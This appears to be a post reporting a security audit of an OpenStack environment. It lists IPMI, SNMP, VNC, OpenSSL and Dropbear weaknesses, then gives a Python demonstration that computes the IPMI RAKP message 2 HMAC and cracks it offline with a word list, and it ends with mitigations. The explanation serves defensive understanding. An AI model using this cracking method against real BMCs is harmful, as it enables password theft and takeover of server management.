This week our Security Team has been performing a security audit of the dSN OpenStack environment. The first results have been quite disturbing:

Critical Risk:

- IPMI Cipher Suite Zero Authentication Bypass. The IPMI service listening on the remote system has cipher suite 0 enabled. Cipher suite 0 means no authentication, no integrity and no confidentiality, so a remote attacker can open an RMCP+ session as an administrator without presenting a valid password. Once logged in, the attacker can perform a variety of actions, including powering off the remote system.

High Risk:

- SNMP community "public" on several hosts.
- IPMI v2.0 Password Hash Disclosure. The remote host supports IPMI v2.0. The Intelligent Platform Management Interface (IPMI) protocol is affected by an information disclosure vulnerability due to the design of RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication. Before the client has proven anything, the BMC answers RAKP message 1 with RAKP message 2, which carries an HMAC keyed with the user's password over values that both sides have already exchanged in cleartext. A remote attacker who knows or guesses a valid username therefore obtains a salted password hash for that account and can brute-force it offline.
- VNC Server Unauthenticated Access.
- OpenSSL 1.0.1 < 1.0.1g Multiple Vulnerabilities (Heartbleed and others).
- Dropbear SSH Server Channel Concurrency Use-after-free Remote Code Execution. The remote host is running a version of Dropbear SSH before 2012.55. As such, it reportedly contains a flaw that might allow an attacker to run arbitrary code on the remote host with root privileges if they are authenticated using a public key and command restriction is enforced.

Medium Risk:

- Vulnerabilities in SSL and TLS configuration (CRIME, BEAST, POODLE, FREAK, Logjam).
- Weak ciphers (RC4, export ciphers).
- HTTP TRACE method enabled.
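To make the RAKP finding concrete, here is an added example (written for this post, not from any scanner or vendor) that builds the RAKP message 2 authentication code exactly as the BMC does and then recovers the password offline from it. All session values below are constructed: the session IDs, random nonces, GUID, username and password are made up, and the tiny word list stands in for a real dictionary.

```python
import hashlib
import hmac
import struct

# Constructed RAKP session values (not captured from any real BMC).
# In a live exchange the console sends SIDc, Rc, the requested role and the
# username in RAKP message 1; the BMC replies in RAKP message 2 with SIDm, Rm,
# its GUID and the HMAC. Everything except the password travels in cleartext.
REMOTE_CONSOLE_SESSION_ID = bytes.fromhex("a0a2a3a4")            # SIDc
MANAGED_SYSTEM_SESSION_ID = bytes.fromhex("02000000")            # SIDm
REMOTE_CONSOLE_RANDOM = bytes.fromhex("0011223344556677" * 2)    # Rc, 16 bytes
MANAGED_SYSTEM_RANDOM = bytes.fromhex("8899aabbccddeeff" * 2)    # Rm, 16 bytes
MANAGED_SYSTEM_GUID = bytes.fromhex("0102030405060708090a0b0c0d0e0f10")
REQUESTED_ROLE = 0x14        # Administrator privilege level byte from message 1
USERNAME = b"admin"
BMC_PASSWORD = b"Passw0rd"   # constructed; only the BMC side knows this


def rakp2_salt(sid_c, sid_m, rand_c, rand_m, guid_m, role, username):
    """Bytes the BMC authenticates in RAKP message 2 (IPMI 2.0 spec, RAKP-HMAC-SHA1):
    SIDc || SIDm || Rc || Rm || GUIDm || role || len(username) || username."""
    return (sid_c + sid_m + rand_c + rand_m + guid_m
            + struct.pack("<BB", role, len(username)) + username)


def rakp2_hmac(password, salt, digest=hashlib.sha1):
    """Key exchange authentication code: HMAC over the salt, keyed with the user
    password. The spec zero-pads the password to 20 bytes; HMAC zero-pads short
    keys to the block size anyway, so the result is the same for short passwords."""
    return hmac.new(password, salt, digest).digest()


def bmc_build_message2():
    """What the attacker observes on the wire: the cleartext salt and the HMAC."""
    salt = rakp2_salt(REMOTE_CONSOLE_SESSION_ID, MANAGED_SYSTEM_SESSION_ID,
                      REMOTE_CONSOLE_RANDOM, MANAGED_SYSTEM_RANDOM,
                      MANAGED_SYSTEM_GUID, REQUESTED_ROLE, USERNAME)
    return salt, rakp2_hmac(BMC_PASSWORD, salt)


def recover_password(observed_hmac, salt, candidates, digest=hashlib.sha1):
    """Offline dictionary attack: no further traffic to the BMC is needed."""
    for candidate in candidates:
        if hmac.compare_digest(rakp2_hmac(candidate, salt, digest), observed_hmac):
            return candidate
    return None


def demo(wordlist=(b"admin", b"password", b"Passw0rd", b"root")):
    """Attacker's view: grab message 2 once, then crack it against a word list."""
    salt, observed = bmc_build_message2()
    return recover_password(observed, salt, wordlist)


if __name__ == "__main__":
    print("recovered:", demo())
```

The attacker never needs the real password to trigger the disclosure: one RAKP message 1 with a guessed username is enough, and the resulting 20-byte HMAC-SHA1 is a conventional salted hash that tools such as hashcat (mode 7300, "IPMI2 RAKP HMAC-SHA1") crack at GPU speed. That is why this finding cannot be patched at the protocol level; the practical mitigations are long random BMC passwords, an isolated management network, and removing IPMI-over-LAN exposure wherever it is not needed.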